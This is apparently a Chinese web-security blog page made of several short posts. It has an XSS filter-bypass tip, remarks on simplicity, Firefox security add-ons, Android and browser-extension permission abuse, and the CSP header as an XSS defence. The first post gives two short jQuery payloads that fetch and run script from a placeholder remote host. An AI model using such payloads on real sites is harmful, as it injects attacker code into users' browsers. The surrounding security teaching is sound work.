后台灰盒+exp被限制40字符+script等标签被过滤。

很多人祭出0day bypass,没必要。先分析场景。最爽的是我看到场景使用了jquery,在昨天的一个攻击场景下,我推测那后台用jquery是必然的。

于是简短强悍的exp如:

1. eval($.get('//xxxx.com'))
2. $.getScript('//xxx.com') // 这个最牛逼,我当时没意识到,pw实战发现

思想是:攻击得原生态,依赖场景,这个思想在我们那本《Web前端黑客技术揭秘》第七章有鲜活说法。

大家举一反三吧。

花了几小时改版了web2hack.org,想表达的意思更清晰了,这次改版除了上线“消息列表”外,还特别加入了几个好资源,大家可以去围观:http://web2hack.org/。这个是专门为《Web前端黑客技术揭秘》这本书准备的站点,弥补书里的点点缺憾:.)

PS:web2hack.org目前使用的是sae海外节点,所以很慢……刷新几次吧- –

截图备份:

1

一切事物都应该是简单的。复杂的原因是因为思维在复杂,如果我们思考问题也能简单,那结果一定很美好。

无论是某个技术细节,某个架构,某个产品,某个团队,如果我们不能发现其中简单的本质,这些都将越来越艰难,越来越不稳定,直到失败。

解决问题之道在于:找到解决方法所在的层面。因为这样才能找到简单。

以上来自我的历史经验思考,还是那句话:懂的人懂,不懂的人不懂。

:)

原文发到我的知乎专栏了:http://zhuanlan.zhihu.com/evilcos/19578244。by 余弦 2013不断扩充扩充,想到哪扩充到哪。

update: 2013/10/10

Firefox下

  1. Firebug,调试js,HTTP请求响应观察,Cookie,DOM树观察等;
  2. GreaseMonkey,自己改了个Cookie修改脚本,其他同学可以用这款:Original Cookie Injector for Greasemonkey
  3. Noscript,进行一些js的阻断;
  4. AutoProxy,翻墙必备;

Continue reading

由于某些原因,昨天一天时间就在虚拟机(单独准备一个,各组环境+工具,环境的准备还是比较耗时的)里按照看雪上的一些经典教程实战了一遍,实战出真知,速度快,对我来说基本是完全新的知识,不过掌握还是很快的,很多原因是因为我的基础还是比较扎实,有种一通百通的感觉。

搞这些的时候,让我想到浏览器扩展的权限问题,尤其是Chrome上的,我那本书《Web前端黑客技术揭秘》第7章有分享一个案例,现在的Chrome扩展很多是滥用权限,可以作为后门存在,android上的应用也是这样的问题。

实际上搞安全,真是一通百通的事,前提是:你吃下了某一个体系,才可能有这样的感觉。

android已经是主流,没理由不去好好了解,趁现在android的安全体系还很混乱之际,各种流氓应用、病毒、安全工具都在疯狂爆发,应该好好玩玩,总有一天,android会走上“安全”之路的。

最后,基础很关键,不要浮夸。:)

http://threatpost.com/csp-1-0-added-to-firefox-to-block-xss-attacks/

X-Content-Security-Policy头会变为:Content-Security-Policy。

我没测试,不过据说Firefox、Chrome、IE10(沙箱模式)都支持了这个头。CSP1.0 还支持内嵌的样式的屏蔽,这些目的都是为了防御XSS。

我们的《Web前端黑客技术揭秘》最后一章有详细说明(http://vdisk.weibo.com/s/GDqYZ开放),并认为CSP最终会成为XSS的终结者。不过这需要那些网站配合浏览器的CSP策略了,不仅能保证代码编写规范,也能保证前端安全性。

:)

这篇文章是写个其他圈子的同学看的,有感于这些天的一些发现,大家感兴趣可以看我之前的文章。

我以前并没如此强大的感受,但我现在意识到一点:安全一般情况下看不见,在你周围漂浮着,显现出来后,往往会刻骨铭心……

正因为安全看不见,所以往往不受重视,因为感知到的概率真的太低,用户的第一感知是他看得见、摸得着、嗅得到、品得出的东西,实实在在的东西,而不是那种虚无缥缈的东西,我们对概率低的东西往往默认选择忽略

Continue reading